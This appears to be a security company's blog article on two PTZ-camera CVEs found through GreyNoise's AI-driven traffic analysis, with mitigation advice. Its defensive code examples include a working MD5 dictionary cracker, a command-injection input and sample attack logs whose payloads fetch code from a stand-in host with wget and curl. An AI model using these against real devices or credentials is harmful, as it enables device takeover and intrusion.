
GreyNoise, AI, Zero-Days: AI’s Rapid Advancement in the Field of IDR

GreyNoise Intelligence recently identified two critical zero-day vulnerabilities in internet-connected live-streaming cameras, highlighting the need for proactive detection and stronger security controls in widely deployed IoT devices. The flaws illustrate the growing risk that IoT devices pose in sensitive settings such as healthcare facilities, industrial plants, government operations, and religious institutions. This article outlines the nature of the vulnerabilities, their potential impact across sectors, and the role AI played in uncovering them.


Background: GreyNoise’s AI-Driven Threat Detection

GreyNoise, a cybersecurity firm with a reputation for advanced threat intelligence, uses an extensive network of sensors to track malicious internet traffic and distinguish it from benign activity. This network enables the detection of emerging threats by analyzing patterns that might otherwise go unnoticed by conventional security measures. In this case, GreyNoise’s AI-driven tools flagged unusual activity targeting specific live-streaming PTZ (pan-tilt-zoom) cameras. The flagged traffic led to the discovery of two previously unknown vulnerabilities, underscoring the effectiveness of AI in early detection.


Vulnerabilities Identified: CVE-2024-8956 and CVE-2024-8957

GreyNoise’s findings cover two zero-day vulnerabilities in PTZ cameras, devices that are often deployed where privacy and operational reliability matter most. The affected models are cameras equipped with NewTek’s Network Device Interface (NDI) technology and running firmware versions prior to 6.3.40. They are sold under brands such as PTZOptics, Multicam Systems SAS, and SMTAV Corporation, and all are built on the HiSilicon Hi3516A V600 system-on-chip platform.

CVE-2024-8956 (Insufficient Authentication, CVSS Score: 9.1)

The first vulnerability, CVE-2024-8956, exposes devices to unauthorized access because the camera does not adequately enforce authentication on sensitive functionality. An attacker who can reach the device over the network can retrieve usernames, MD5-hashed passwords, and other configuration data. MD5 is a fast, general-purpose hash that has long been considered unfit for password storage: with the hashes in hand, an attacker can test candidate passwords offline at very high speed, recover weak or reused credentials, and then log in to take over the device and view private video feeds.
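
To make the MD5 point concrete, the following added example (written for this article, not GreyNoise’s code or any camera vendor’s) runs an offline dictionary attack against a constructed set of leaked credentials. The account names, the wordlist and the "operator" passphrase are made up; the first two digests are the well-known MD5 values of "admin" and "123456". Because the hashes are unsalted, one digest computation is checked against every leaked account at once, so the attack does not get more expensive as more accounts leak.

```python
"""Offline dictionary attack against leaked, unsalted MD5 password hashes.

Added illustration of why exposing MD5-hashed credentials is serious; this is
not GreyNoise's code or any camera vendor's code. The account names, hashes
and wordlist below are constructed for the example.
"""
import hashlib
from typing import Dict, Iterable, Optional


def md5_hex(password: str) -> str:
    """Unsalted MD5 hex digest: the weak scheme an exposed config would hold."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


# Constructed "leaked" credential store: account -> unsalted MD5 hash.
# The first two digests are the well-known MD5 values of "admin" and "123456".
LEAKED_ACCOUNTS: Dict[str, str] = {
    "admin": "21232f297a57a5a743894a0e4a801fc3",
    "stream": "e10adc3949ba59abbe56e057f20f883e",
    # A strong passphrase, hashed here only so the example is self-contained.
    "operator": md5_hex("orbit-quartz-lantern-73"),
}

# Tiny constructed wordlist; real attacks use millions of entries.
WORDLIST = ["admin", "password", "123456", "camera", "ptz", "stream", "welcome"]

# Mangling rules: cheap transformations that catch "policy-compliant" variants.
SUFFIXES = ["", "1", "123", "!", "2024"]


def candidates(words: Iterable[str]) -> Iterable[str]:
    """Yield each word plus its capitalised and suffixed variants."""
    for word in words:
        for base in (word, word.capitalize()):
            for suffix in SUFFIXES:
                yield base + suffix


def crack(leaked: Dict[str, str], words: Iterable[str]) -> Dict[str, Optional[str]]:
    """Recover the password of every account whose hash is in the candidate space.

    The hashes are unsalted, so each candidate digest is computed once and
    looked up against *all* accounts at the same time: the cost of the attack
    does not grow with the number of leaked accounts.
    """
    wanted: Dict[str, list] = {}  # digest -> accounts that share it
    for account, digest in leaked.items():
        wanted.setdefault(digest.lower(), []).append(account)
    recovered: Dict[str, Optional[str]] = {account: None for account in leaked}
    for candidate in candidates(words):
        for account in wanted.get(md5_hex(candidate), ()):
            recovered[account] = candidate
    return recovered


if __name__ == "__main__":
    for account, password in crack(LEAKED_ACCOUNTS, WORDLIST).items():
        print(f"{account:10s} {password if password is not None else '(not in wordlist)'}")
```

Only the strong passphrase survives; the two weak credentials fall to a seven-word list with trivial mangling. A salted, deliberately slow password hash (PBKDF2, bcrypt, scrypt or Argon2) would force the attacker to repeat the expensive work per account and per candidate, which is exactly what MD5 does not do.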

CVE-2024-8957 (OS Command Injection, CVSS Score: 7.2)

The second vulnerability, CVE-2024-8957, is an OS command injection flaw that allows an attacker to execute arbitrary commands on the camera’s underlying operating system. Chained with CVE-2024-8956, which supplies the access that command execution would otherwise require, it gives an attacker total control of the device: the ability to view, alter, or disable video streams, or to use the camera as a foothold for other malicious activity such as Distributed Denial-of-Service (DDoS) attacks.
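
The example below is added for this article and is not the cameras’ firmware or any vendor’s code. It shows the shape of an OS command injection bug and its fix in a web handler that applies a client-supplied NTP server; that setting is a hypothetical stand-in, since this page does not identify the affected parameter, and `echo` replaces the real system command so the code runs harmlessly on any host with /bin/sh.

```python
"""OS command injection: a shell-interpolating handler beside a hardened one.

Added illustration, not the cameras' firmware or any vendor's code. A settings
handler that applies an NTP server supplied by the client is a hypothetical
stand-in for whatever the affected parameter actually was; `echo` replaces the
real system command so the example runs harmlessly anywhere with /bin/sh.
"""
import ipaddress
import re
import subprocess

# RFC 1123 hostname: labels of letters, digits and hyphens, no leading or
# trailing hyphen, at most 253 characters in total.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def set_ntp_server_vulnerable(host: str) -> str:
    """Vulnerable: the client-controlled value is pasted into a shell command.

    ';', '|', '&&', backticks and $(...) all let the client append arbitrary
    commands that run with the privileges of the web server process.
    """
    completed = subprocess.run(
        f"echo configuring ntp {host}", shell=True,
        capture_output=True, text=True, check=False,
    )
    return completed.stdout


def is_valid_host(host: str) -> bool:
    """True only for an IP literal or an RFC 1123 hostname."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return HOSTNAME_RE.match(host) is not None


def set_ntp_server_hardened(host: str) -> str:
    """Hardened: allow-list validation, then an argv list with no shell.

    Either control alone would defeat this payload; together they also cover
    a value that slips past validation and any later change of the command.
    """
    if not is_valid_host(host):
        raise ValueError(f"invalid NTP server: {host!r}")
    completed = subprocess.run(
        ["echo", "configuring", "ntp", host],
        capture_output=True, text=True, check=True,
    )
    return completed.stdout


if __name__ == "__main__":
    payload = "pool.example.org; echo INJECTED"  # constructed attack input
    print(set_ntp_server_vulnerable(payload), end="")  # second line: INJECTED
    try:
        set_ntp_server_hardened(payload)
    except ValueError as exc:
        print("rejected:", exc)
    print(set_ntp_server_hardened("pool.example.org"), end="")
```

The vulnerable handler prints `INJECTED` on its own line because `sh -c` treats the `;` as a command separator. The hardened handler rejects the payload outright, and even a value that passed validation would reach `echo` as a single argument, never as shell syntax.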


Sector-Specific Risks

The wide-ranging use of PTZ cameras in sensitive environments makes these vulnerabilities especially concerning:

  • Industrial Operations: Many manufacturing plants use PTZ cameras for quality control and equipment monitoring. Unauthorized access could allow attackers to surveil operations or disrupt critical monitoring.
  • Healthcare and Telehealth: In medical settings, these cameras may enable telehealth and surgical streaming. A breach could expose patient data, violate privacy regulations, and disrupt essential services.
  • Government and Judicial Settings: Government facilities, including courtrooms, rely on secure video streams for both transparency and security. A vulnerability in these environments could compromise sensitive proceedings or disrupt government operations.
  • Religious Institutions: Streaming cameras are often used in houses of worship to broadcast services. Unpatched vulnerabilities could allow attackers to disrupt live streams or monitor services.

AI’s Role in Early Detection and Mitigation

GreyNoise’s AI-driven tools played a critical role in identifying these vulnerabilities before they were widely exploited. By analyzing global traffic patterns, GreyNoise’s system flagged the exploit attempt as an anomaly. This proactive approach allowed researchers to isolate and investigate the vulnerabilities, leading to their disclosure and the timely development of solutions.


Responsible Disclosure and Next Steps

Following the discovery, GreyNoise collaborated with VulnCheck to disclose these vulnerabilities responsibly to the affected vendors. This collaboration provided manufacturers with the information needed to address the flaws before they could be exploited on a broader scale. Responsible disclosure is crucial in ensuring that security gaps are addressed swiftly, protecting users from potential exploitation.


The Future of AI in IDR

GreyNoise’s application of AI in incident detection and response (IDR) offers a strong case for using machine learning in managing and mitigating cybersecurity threats, especially in high-stakes settings that involve real-time data and sensitive environments. Here’s why you might see AI more heavily adopted in the IDR field:

How AI Improves IDR

AI operates at a scale that lets organizations analyze vast amounts of data almost instantaneously, scanning for deviations that human analysts would take far longer to spot. This is particularly valuable in IoT contexts, where network size and device count make manual monitoring impractical. By leveraging AI, GreyNoise was able to sift through internet traffic at global scale and identify malicious activity targeting live-streaming cameras without manual review of each device. Once the activity was flagged, it could be investigated and the underlying vulnerabilities responsibly disclosed.

Proactive vs. Reactive Cybersecurity

Traditional incident response is largely reactive: teams act after a breach has been detected, by which time sensitive data or operations may already be compromised. AI’s real-time capabilities support a more proactive posture, in which anomalous patterns are flagged before a vulnerability is exploited at scale. GreyNoise’s detection of CVE-2024-8956 and CVE-2024-8957 shows how this can buy organizations lead time to patch or isolate affected devices. That lead time matters most in settings such as industrial sites, healthcare facilities, and government agencies, where IoT vulnerabilities can lead to privacy breaches, service disruptions, or even physical security risks.

AI as the Future of IDR

The use of AI by GreyNoise demonstrates how machine learning and behavioral analytics will continue to reshape IDR. As AI becomes more integrated into cybersecurity, we can expect faster threat detection, more accurate identification of potential attacks, and a proactive approach to securing IoT networks and other critical infrastructure. These capabilities are essential in a world where the number and complexity of IoT-connected devices are only increasing. By enabling faster, data-driven responses to cyber threats, AI not only improves the security of individual devices but also contributes to broader network resilience and reliability across sectors.


How Organizations Can Safeguard IoT Devices

Organizations relying on IoT devices like PTZ cameras can take several steps to improve security:

  • Patch Management: Regularly update firmware and software on IoT devices. Confirm with vendors whether your devices are affected by known vulnerabilities (for the cameras discussed here, firmware 6.3.40 or later addresses both CVEs) and apply patches promptly.
  • Network Segmentation: Place IoT devices on their own network segment and keep their management interfaces off the public internet, so that a compromised camera cannot be used to reach sensitive systems.
  • Enhanced Authentication: Replace default credentials with strong, unique passwords, enable multi-factor authentication where the device supports it, and prefer devices whose vendors store credentials with modern password hashing rather than MD5.
  • Traffic Monitoring and AI Detection: Use AI-driven security tooling to monitor network traffic and detect unusual activity, so that exploitation attempts can be flagged before they become widespread.
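
The kind of analysis described in the section on how AI improves IDR, and recommended in the last bullet above, can be sketched without any machine learning: group sensor requests by a signature, compare a window against a baseline, and raise anything new that several unrelated sources are hitting at once. The example below is added for this article; it is not GreyNoise’s code and does not reproduce their methods. Its log lines are constructed, the addresses come from documentation ranges, and the `/cgi-bin/settings.cgi` path and `ntp_server` parameter are hypothetical.

```python
"""Surface new, distributed request patterns in sensor or honeypot HTTP logs.

Added illustration of the kind of anomaly analysis described on this page; it
is not GreyNoise's code and does not reproduce their methods. The log lines
are constructed, the addresses are from documentation ranges, and the path
and parameter names are hypothetical.
"""
import re
from collections import defaultdict
from typing import Dict, List, Tuple
from urllib.parse import unquote, urlsplit

# Line format: <ISO timestamp> <client ip> "<METHOD> <path?query> HTTP/x.y"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"$'
)
# Characters that have no business in a hostname, a number or an on/off flag.
SHELL_META = re.compile(r"[;&|`]|\$\(")

Signature = Tuple[str, str, Tuple[str, ...]]  # (method, path, sorted param names)

# Constructed baseline: the ordinary background scanning every sensor sees.
BASELINE_LOG = [
    '2024-04-01T00:00:05Z 198.51.100.7 "GET / HTTP/1.1"',
    '2024-04-01T00:01:12Z 198.51.100.9 "GET /robots.txt HTTP/1.1"',
    '2024-04-01T00:02:44Z 198.51.100.7 "GET /cgi-bin/settings.cgi?get=version HTTP/1.1"',
]

# Constructed window under analysis: four sources probe the same new pattern
# (one of them twice, with a different payload); one lone source hits /admin.
WINDOW_LOG = [
    '2024-04-20T03:12:41Z 203.0.113.11 "GET / HTTP/1.1"',
    '2024-04-20T03:12:43Z 203.0.113.11 "GET /cgi-bin/settings.cgi?ntp_server=192.0.2.1;wget%20http://203.0.113.50/a HTTP/1.1"',
    '2024-04-20T03:15:02Z 203.0.113.12 "GET /cgi-bin/settings.cgi?ntp_server=192.0.2.1;wget%20http://203.0.113.50/a HTTP/1.1"',
    '2024-04-20T03:15:09Z 203.0.113.12 "GET /cgi-bin/settings.cgi?ntp_server=192.0.2.1|curl%20203.0.113.50/a HTTP/1.1"',
    '2024-04-20T03:19:30Z 203.0.113.13 "GET /cgi-bin/settings.cgi?ntp_server=192.0.2.2;id HTTP/1.1"',
    '2024-04-20T03:22:18Z 203.0.113.14 "GET /cgi-bin/settings.cgi?ntp_server=%24(id) HTTP/1.1"',
    '2024-04-20T03:25:00Z 203.0.113.15 "GET /admin HTTP/1.1"',
]


def parse(line: str) -> Dict[str, object]:
    """Split one log line into source, method, path, parameter names and values."""
    m = LOG_RE.match(line)
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    parts = urlsplit(m.group("target"))
    pairs = [p.split("=", 1) for p in parts.query.split("&") if p]
    names = tuple(sorted(unquote(kv[0]) for kv in pairs))
    values = tuple(unquote(kv[1]) if len(kv) == 2 else "" for kv in pairs)
    return {"ts": m.group("ts"), "src": m.group("src"), "method": m.group("method"),
            "path": parts.path, "params": names, "values": values}


def signature(rec: Dict[str, object]) -> Signature:
    """Method, path and parameter *names*; payload values vary, the shape does not."""
    return (rec["method"], rec["path"], rec["params"])  # type: ignore[return-value]


def find_emerging(baseline: List[str], window: List[str], min_sources: int = 3) -> List[Dict[str, object]]:
    """Return request shapes absent from the baseline but hit by many distinct sources."""
    known = {signature(parse(line)) for line in baseline}
    sources: Dict[Signature, set] = defaultdict(set)
    suspicious: Dict[Signature, bool] = defaultdict(bool)
    for line in window:
        rec = parse(line)
        sig = signature(rec)
        if sig in known:
            continue  # familiar background noise
        sources[sig].add(rec["src"])
        if any(SHELL_META.search(v) for v in rec["values"]):  # type: ignore[union-attr]
            suspicious[sig] = True
    findings = [{"signature": sig, "sources": len(srcs), "shell_metachars": suspicious[sig]}
                for sig, srcs in sources.items() if len(srcs) >= min_sources]
    return sorted(findings, key=lambda f: f["sources"], reverse=True)  # type: ignore[arg-type,return-value]


if __name__ == "__main__":
    for finding in find_emerging(BASELINE_LOG, WINDOW_LOG):
        print(finding)
```

Keying on parameter names rather than values is what makes the four probes collapse into one finding even though each carries a different payload; the distinct-source threshold separates a coordinated or worm-like campaign from one curious scanner, and the shell-metacharacter flag is a cheap triage hint for the analyst who picks the finding up.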

How Can Netizen Help?

Netizen ensures that security gets built in, not bolted on. We provide advanced solutions to protect critical IT infrastructure, including our popular “CISO-as-a-Service” offering, through which companies can leverage the expertise of executive-level cybersecurity professionals without bearing the cost of employing them full time.

We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

Questions or concerns? Feel free to reach out to us any time –

https://www.netizen.net/contact


Copyright © Netizen Corporation. All Rights Reserved.